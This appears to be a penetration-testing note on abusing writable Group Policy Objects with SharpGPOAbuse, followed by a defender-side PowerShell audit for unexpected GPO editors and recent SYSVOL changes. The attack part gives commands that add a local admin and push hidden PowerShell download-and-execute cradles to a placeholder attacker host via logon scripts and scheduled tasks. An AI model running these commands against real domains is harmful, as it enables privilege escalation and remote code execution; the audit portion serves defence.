Once we have found GPOs on which a user we control has edit permissions, we can abuse them with a tool such as SharpGPOAbuse.
Add a local admin by creating a Restricted Groups policy on an existing GPO:
```
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount "user.account" --GPOName "Vulnerable GPO"
```
--force: overrides any existing configurations
Add a user script:
```
.\SharpGPOAbuse.exe --AddUserScript --ScriptName "script.bat" --ScriptContents 'powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring("http://ip.of.attacking.machine:port/a"))\"' --GPOName "Vulnerable GPO"
```
Add a computer task:
```
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "TaskName" --Author "domain\user" --Command "cmd.exe" --Arguments 'powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring("http://ip.of.attacking.machine:port/a"))\"' --GPOName "Vulnerable GPO"
```
<aside> ⏱️ It is necessary to wait for the GPO refresh interval (default 90 minutes) in order to see the effects of the abuse
</aside>
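
The defender-side view of the condition this note starts from, as an added example that is not part of the original note or of SharpGPOAbuse: it lists principals holding edit rights on each GPO and flags recently modified files in the standard SYSVOL locations for Restricted Groups, scheduled-task preferences and user scripts. The allow-list, the 7-day window and the watched file list are assumptions to adjust for your domain.

```powershell
# Added audit example. Requires the GroupPolicy module (RSAT / domain controller).
Import-Module GroupPolicy

# Assumption: principals that are expected to hold edit rights on GPOs.
$ExpectedEditors = @('Domain Admins', 'Enterprise Admins', 'SYSTEM',
                     'ENTERPRISE DOMAIN CONTROLLERS')
# Permission levels that allow changing GPO content (GpoCustom may include write).
$EditRights = @('GpoEdit', 'GpoEditDeleteModifySecurity', 'GpoCustom')
# Assumption: review window for recent file changes.
$Since = (Get-Date).AddDays(-7)
# Standard GPO file locations, relative to the policy folder in SYSVOL.
$WatchedFiles = @(
    'Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf',        # Restricted Groups
    'Machine\Preferences\ScheduledTasks\ScheduledTasks.xml',   # Scheduled tasks
    'User\Scripts\scripts.ini'                                 # User logon/logoff scripts
)

$findings = foreach ($gpo in Get-GPO -All) {
    # 1. Who can edit this GPO, beyond the expected administrators?
    Get-GPPermission -Guid $gpo.Id -All |
        Where-Object { $EditRights -contains $_.Permission.ToString() -and
                       $ExpectedEditors -notcontains $_.Trustee.Name } |
        ForEach-Object {
            [pscustomobject]@{
                Finding = 'UnexpectedEditor'
                Gpo     = $gpo.DisplayName
                Detail  = "$($_.Trustee.Domain)\$($_.Trustee.Name) : $($_.Permission)"
            }
        }

    # 2. Were any of the watched policy files written inside the review window?
    $root = "\\$($gpo.DomainName)\SYSVOL\$($gpo.DomainName)\Policies\{$($gpo.Id)}"
    foreach ($rel in $WatchedFiles) {
        $file = Get-Item -LiteralPath (Join-Path $root $rel) -Force -ErrorAction SilentlyContinue
        if ($file -and $file.LastWriteTime -gt $Since) {
            [pscustomobject]@{
                Finding = 'RecentPolicyFileChange'
                Gpo     = $gpo.DisplayName
                Detail  = "$rel modified $($file.LastWriteTime)"
            }
        }
    }
}

$findings | Sort-Object Finding, Gpo | Format-Table -AutoSize -Wrap
```

A recent change is not malicious by itself; compare each hit against change records, and treat an unexpected editor on a GPO linked to many computers as the higher-priority finding.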